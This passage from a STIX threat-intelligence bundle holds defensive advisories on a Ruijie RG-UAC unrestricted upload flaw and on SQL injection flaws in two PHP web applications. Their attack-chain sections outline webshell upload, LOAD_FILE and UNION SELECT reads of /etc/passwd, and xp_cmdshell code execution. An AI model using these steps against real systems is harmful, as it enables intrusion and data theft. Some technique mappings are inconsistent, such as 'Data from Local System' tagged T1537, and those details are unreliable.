        "hanwang"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14737"
        },
        {
          "source_name": "reference",
          "url": "https://ucn9h68n9289.feishu.cn/docx/RWItdiw5Go02UsxHxgNcMWBqnJc?from=from_copylink"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14737"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/848640"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376320"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376320/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--beeeda13-1d6d-5ff8-b1a6-18e4f572de87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2aae46c5-cc9c-5da0-bff7-21312c423f9a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77e77032-d80c-5e37-8eb3-d0865b0ed909",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2aae46c5-cc9c-5da0-bff7-21312c423f9a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--234de96f-c73f-5a76-a0a8-be4112e56d75",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2aae46c5-cc9c-5da0-bff7-21312c423f9a",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2aae46c5-cc9c-5da0-bff7-21312c423f9a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14736: Ruijie RG-UAC Unrestricted Upload Vulnerability",
      "description": "## Overview\n\nA significant vulnerability, identified as CVE-2026-14736, has been discovered in Ruijie RG-UAC firmware up to version 1.0-R1.8.2.p5. This flaw, categorized as an unrestricted file upload (CWE-434), resides within an unknown function associated with the `user_auth_commit.php` file. Attackers can exploit this by manipulating the `upload_image` argument to bypass security checks and upload arbitrary files to the system. This attack can be carried out remotely without authentication, and a public exploit is available, increasing the urgency for defensive measures. Successful exploitation could grant threat actors the ability to execute arbitrary code on the affected device, leading to full system compromise, data exfiltration, or further network penetration.\n\n## Attack Chain\n\n1.  **Initial Access**: An unauthenticated remote attacker identifies a vulnerable Ruijie RG-UAC device exposed on the internet.\n2.  **Exploitation**: The attacker crafts and sends a specially malformed HTTP POST request to the `user_auth_commit.php` endpoint on the vulnerable Ruijie RG-UAC device.\n3.  **Unrestricted Upload**: Within the POST request, the attacker manipulates the `upload_image` argument to include a malicious file, such as a webshell (e.g., `shell.php` or `cmd.jsp`), which the vulnerable application then writes to a web-accessible directory on the server due to the flaw.\n4.  **Malicious File Placement**: The RG-UAC application fails to properly validate the uploaded file's type, content, or extension, allowing the attacker's chosen payload to be stored on the system.\n5.  **Remote Code Execution Trigger**: The attacker sends a subsequent HTTP GET request to the known or inferred path of the uploaded webshell, causing the server to execute the malicious code embedded within it.\n6.  **Post-Exploitation**: With the webshell executed, the attacker gains remote command execution capabilities on the underlying operating system of the Ruijie RG-UAC device, enabling further actions like data exfiltration, system modification, or pivot to other internal network resources.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14736 grants an unauthenticated remote attacker arbitrary file upload capabilities, which can directly lead to remote code execution (RCE) on the compromised Ruijie RG-UAC device. This enables full control over the affected system, allowing attackers to manipulate configurations, exfiltrate sensitive data, disrupt network operations, or establish a foothold for lateral movement within the victim's network. While no specific victim organizations or sectors have been detailed in the public information, any organization utilizing vulnerable versions of Ruijie RG-UAC devices is at risk due to the remote nature of the exploit and its public availability.\n\n## Recommendation\n\n*   Immediately patch CVE-2026-14736 by updating all Ruijie RG-UAC devices to a version beyond 1.0-R1.8.2.p5 as recommended by the vendor.\n*   Ensure proper web server logging is enabled for all internet-facing devices, specifically logging HTTP POST and GET requests including URI stems, query parameters, and user-agent strings.\n*   Review web server logs for suspicious POST requests to `/user_auth_commit.php` followed by anomalous GET requests to newly created files in web-accessible directories, which could indicate exploitation attempts related to CVE-2026-14736.\n",
      "published": "2026-07-05T10:29:55Z",
      "labels": [
        "vulnerability",
        "rce",
        "unrestricted-file-upload",
        "webserver",
        "cve-2026-14736"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14736"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14736"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376318"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5f756e60-6c8d-51d2-98b0-2c8b62270618",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:29:08Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7cfefe11-e452-5c2a-9926-7e6c833d69dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "indicator--5f756e60-6c8d-51d2-98b0-2c8b62270618"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--67b6b859-262b-580c-b6ea-f12e0fbfc692",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://medium.com/@avdzav10/sql-injection-leading-to-arbitrary-file-read-in-smart-parking-system-php-2cd5b084f9e1",
      "pattern": "[url:value = 'https://medium.com/@avdzav10/sql-injection-leading-to-arbitrary-file-read-in-smart-parking-system-php-2cd5b084f9e1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:29:08Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db124907-3010-5fda-a20b-ed91754d52a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "indicator--67b6b859-262b-580c-b6ea-f12e0fbfc692"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--df1cff3c-e605-5bcf-84ac-538b1eb61bdc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14735",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14735']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:29:08Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4b3ed63-4b48-5b3d-b1dc-e5de6d80173a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "indicator--df1cff3c-e605-5bcf-84ac-538b1eb61bdc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--287326d6-ebf0-5145-90c7-6b06893a91ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/848002",
      "pattern": "[url:value = 'https://vuldb.com/submit/848002']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:29:08Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--673ad390-00f4-5631-bfd1-c411b8109d12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "indicator--287326d6-ebf0-5145-90c7-6b06893a91ba"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d1930fb2-5633-569c-8507-40d8a703cc62",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376317",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376317']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:29:08Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0986991a-c2d6-5ad6-b054-8ae4bbad7da6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "indicator--d1930fb2-5633-569c-8507-40d8a703cc62"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a5ef5789-7783-5c1e-8687-f77aa951a028",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376317/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376317/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:29:08Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64a92799-5f13-5afe-8ddb-ef7b5cc4131f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "indicator--a5ef5789-7783-5c1e-8687-f77aa951a028"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--97695389-8655-5818-9132-b3a4383e8112",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2682841-8d10-5331-ab97-2a73067f85f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c55c841c-dd8d-5777-9121-e78c2e004fac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14735: SQL Injection Vulnerability in code-projects Smart Parking System",
      "description": "## Overview\n\nA significant SQL injection vulnerability, tracked as CVE-2026-14735, has been discovered in version 1.0 of the code-projects Smart Parking System. The flaw resides within an unspecified function of the `/parkings/parkings.php` file, where improper handling of user-supplied input to the `street`, `city`, or `status` parameters allows for remote SQL injection. This vulnerability enables unauthenticated attackers to execute arbitrary SQL commands against the backend database. Public disclosure of exploit details indicates the potential for active exploitation, with one reported consequence being the ability to perform arbitrary file reads on the underlying system, exposing sensitive data to attackers. Organizations using this system are at high risk of data breaches and unauthorized access.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable instance of code-projects Smart Parking System 1.0 accessible via the internet.\n2.  The attacker crafts a malicious HTTP GET request targeting the `/parkings/parkings.php` endpoint.\n3.  The crafted request includes SQL injection payloads within the `street`, `city`, or `status` URL parameters, designed to bypass input validation.\n4.  The vulnerable application processes the unsanitized input, causing the backend database to execute the attacker's injected SQL commands.\n5.  The injected SQL commands leverage database capabilities (e.g., `LOAD_FILE()` or `UNION SELECT` statements) to read arbitrary files from the server's file system (e.g., `/etc/passwd`, application configuration files).\n6.  The database query results, containing the contents of the requested files, are returned within the HTTP response to the attacker.\n7.  The attacker parses the HTTP response to extract the sensitive file contents, achieving data exfiltration.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14735 could lead to significant data breaches, potentially exposing sensitive information from configuration files, system credentials, or other critical files on the server. The ability to perform arbitrary file reads allows attackers to gain reconnaissance about the system, retrieve database credentials, or even steal application source code. While the NVD does not specify victim counts or targeted sectors, any organization using the code-projects Smart Parking System 1.0 is susceptible. The public disclosure of exploit details increases the likelihood of widespread exploitation.\n\n## Recommendation\n\n*   Immediately patch or update code-projects Smart Parking System to a non-vulnerable version if available. If no patch is available, remove the application from public access until a fix is released.\n*   Deploy the provided Sigma rule to your SIEM to detect attempts to exploit CVE-2026-14735 via suspicious parameters in web requests.\n*   Review web server access logs for HTTP GET requests to `/parkings/parkings.php` containing SQL injection patterns in the `street`, `city`, or `status` parameters.\n*   Implement a Web Application Firewall (WAF) in front of affected systems and ensure it is configured to detect and block SQL injection attempts.\n",
      "published": "2026-07-05T10:29:08Z",
      "labels": [
        "sql-injection",
        "vulnerability",
        "web-application",
        "php",
        "cve"
      ],
      "object_refs": [
        "indicator--5f756e60-6c8d-51d2-98b0-2c8b62270618",
        "indicator--67b6b859-262b-580c-b6ea-f12e0fbfc692",
        "indicator--df1cff3c-e605-5bcf-84ac-538b1eb61bdc",
        "indicator--287326d6-ebf0-5145-90c7-6b06893a91ba",
        "indicator--d1930fb2-5633-569c-8507-40d8a703cc62",
        "indicator--a5ef5789-7783-5c1e-8687-f77aa951a028",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14735"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://medium.com/@avdzav10/sql-injection-leading-to-arbitrary-file-read-in-smart-parking-system-php-2cd5b084f9e1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14735"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/848002"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376317"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376317/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8bea1557-1270-5bc4-bb2f-815db8ede054",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/cyberdrinclc-bot/cves/issues/1",
      "pattern": "[url:value = 'https://github.com/cyberdrinclc-bot/cves/issues/1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:22:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9310a5b1-6501-5923-a1b2-5a8bfd0e7450",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "indicator--8bea1557-1270-5bc4-bb2f-815db8ede054"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a5c44ffe-edf7-5b7a-a99b-6787a69ff17a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14734",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14734']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:22:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d68a4a72-d892-5da4-9f6c-2cd8b09de76c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "indicator--a5c44ffe-edf7-5b7a-a99b-6787a69ff17a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c6142dca-f267-5a33-a231-61ee228f5db4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/848001",
      "pattern": "[url:value = 'https://vuldb.com/submit/848001']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:22:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3094d77-7e05-55bc-bd99-84873578513e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "indicator--c6142dca-f267-5a33-a231-61ee228f5db4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2d8ba58e-068b-5282-a56f-51a2979e68b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376316",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376316']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:22:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15b31304-88dd-5e6e-88c0-665a16ce33ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "indicator--2d8ba58e-068b-5282-a56f-51a2979e68b2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ea2bb843-f2cc-58f0-89b7-6639dd6d75ac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376316/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376316/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:22:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--88a9341a-bdb1-5899-8b2f-96bf9b4d7529",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "indicator--ea2bb843-f2cc-58f0-89b7-6639dd6d75ac"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--071e6e47-12a0-54fb-bef1-cd4ae7829233",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.sourcecodester.com/",
      "pattern": "[url:value = 'https://www.sourcecodester.com/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-05T10:22:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--69f4182c-fda2-50dc-bb92-e06a1ee5ac19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "indicator--071e6e47-12a0-54fb-bef1-cd4ae7829233"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Application Exploitation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e67db604-373f-5152-a319-c71146077191",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Active Scanning",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1595",
          "url": "https://attack.mitre.org/techniques/T1595"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6332ffc2-61c0-541a-a2c9-1f9abb84c9b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38448985-5eeb-534b-a118-dee34ef3b347",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b842e0ca-6cb8-5f8a-afe4-142542c51f89",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14734: SQL Injection in SourceCodester Class and Exam Timetabling System",
      "description": "## Overview\n\nA high-severity SQL injection vulnerability, identified as CVE-2026-14734, has been discovered in the SourceCodester Class and Exam Timetabling System version 1.0. The flaw is located in an unspecified function within the `/edit_product.php` file, where improper input sanitization allows an attacker to inject malicious SQL commands by manipulating the 'ID' argument. This vulnerability enables remote exploitation, meaning attackers can leverage it without requiring prior authentication or local access to the system. The existence of a publicly disclosed exploit significantly increases the immediate risk to organizations using this software, making them prime targets for data compromise, unauthorized access, and potential system control. Defenders should prioritize patching and monitoring for exploitation attempts against this critical web application flaw.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification**: An attacker identifies an internet-facing instance of SourceCodester Class and Exam Timetabling System 1.0 and notes the presence of the `/edit_product.php` endpoint.\n2.  **Payload Crafting**: The attacker crafts a specially designed HTTP GET or POST request containing SQL injection payloads, such as single quotes, comments, or boolean-based conditions, within the `ID` parameter targeting the `/edit_product.php` file.\n3.  **Initial Access (Injection)**: The crafted HTTP request is sent to the vulnerable web application.\n4.  **Database Interaction**: The application processes the unsanitized `ID` argument, leading to the execution of the attacker's injected SQL query by the backend database.\n5.  **Information Disclosure / Privilege Escalation**: The attacker exploits the SQL injection to extract sensitive database content (e.g., user credentials, system configuration, academic records) or, if possible, escalate privileges within the database server.\n6.  **Impact (Data Exfiltration/Manipulation)**: The attacker exfiltrates collected data or uses the SQL injection to modify, delete, or insert data directly into the database, achieving confidentiality and integrity compromise.\n7.  **Optional Persistence/RCE**: Depending on the underlying database and server configuration, the attacker might leverage advanced SQL injection techniques (e.g., `xp_cmdshell` on MSSQL, `LOAD_FILE/INTO OUTFILE` on MySQL) to achieve remote code execution or establish persistence on the web server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14734 can lead to significant compromise of the SourceCodester Class and Exam Timetabling System. Attackers can gain unauthorized access to the application's database, leading to potential exfiltration of sensitive information such as student records, exam schedules, class data, and potentially user credentials. This can result in privacy breaches, academic disruption, and reputational damage for educational institutions or organizations utilizing the system. The vulnerability allows for data manipulation, which could lead to altered schedules, grades, or other critical information, causing operational chaos and distrust. With a CVSS v3.1 score of 7.3 (High) and a publicly available exploit, the risk of widespread compromise is substantial.\n\n## Recommendation\n\n*   Immediately apply any available patches or updates for SourceCodester Class and Exam Timetabling System 1.0 to address CVE-2026-14734.\n*   Deploy the Sigma rule provided in this brief to your SIEM/logging solution to detect attempts to exploit CVE-2026-14734.\n*   Review web server logs for suspicious requests to `/edit_product.php` containing SQL injection payloads, and consider implementing a Web Application Firewall (WAF) to filter malicious input for `/edit_product.php`.\n*   Block network access to the domains listed in the IOC table at the perimeter firewall or proxy if not legitimately accessed.\n",
      "published": "2026-07-05T10:22:13Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "vulnerability",
        "initial-access"
      ],
      "object_refs": [
        "indicator--8bea1557-1270-5bc4-bb2f-815db8ede054",
        "indicator--a5c44ffe-edf7-5b7a-a99b-6787a69ff17a",
        "indicator--c6142dca-f267-5a33-a231-61ee228f5db4",
        "indicator--2d8ba58e-068b-5282-a56f-51a2979e68b2",
        "indicator--ea2bb843-f2cc-58f0-89b7-6639dd6d75ac",
        "indicator--071e6e47-12a0-54fb-bef1-cd4ae7829233",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--26ef37e6-18b0-51e5-b888-57037be44a7c",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14734"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/cyberdrinclc-bot/cves/issues/1"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14734"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/848001"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376316"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376316/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8756fc2a-df6b-5864-bfba-ec8317808faf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3b51f574-a324-5c77-bd85-caaacbea9539",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
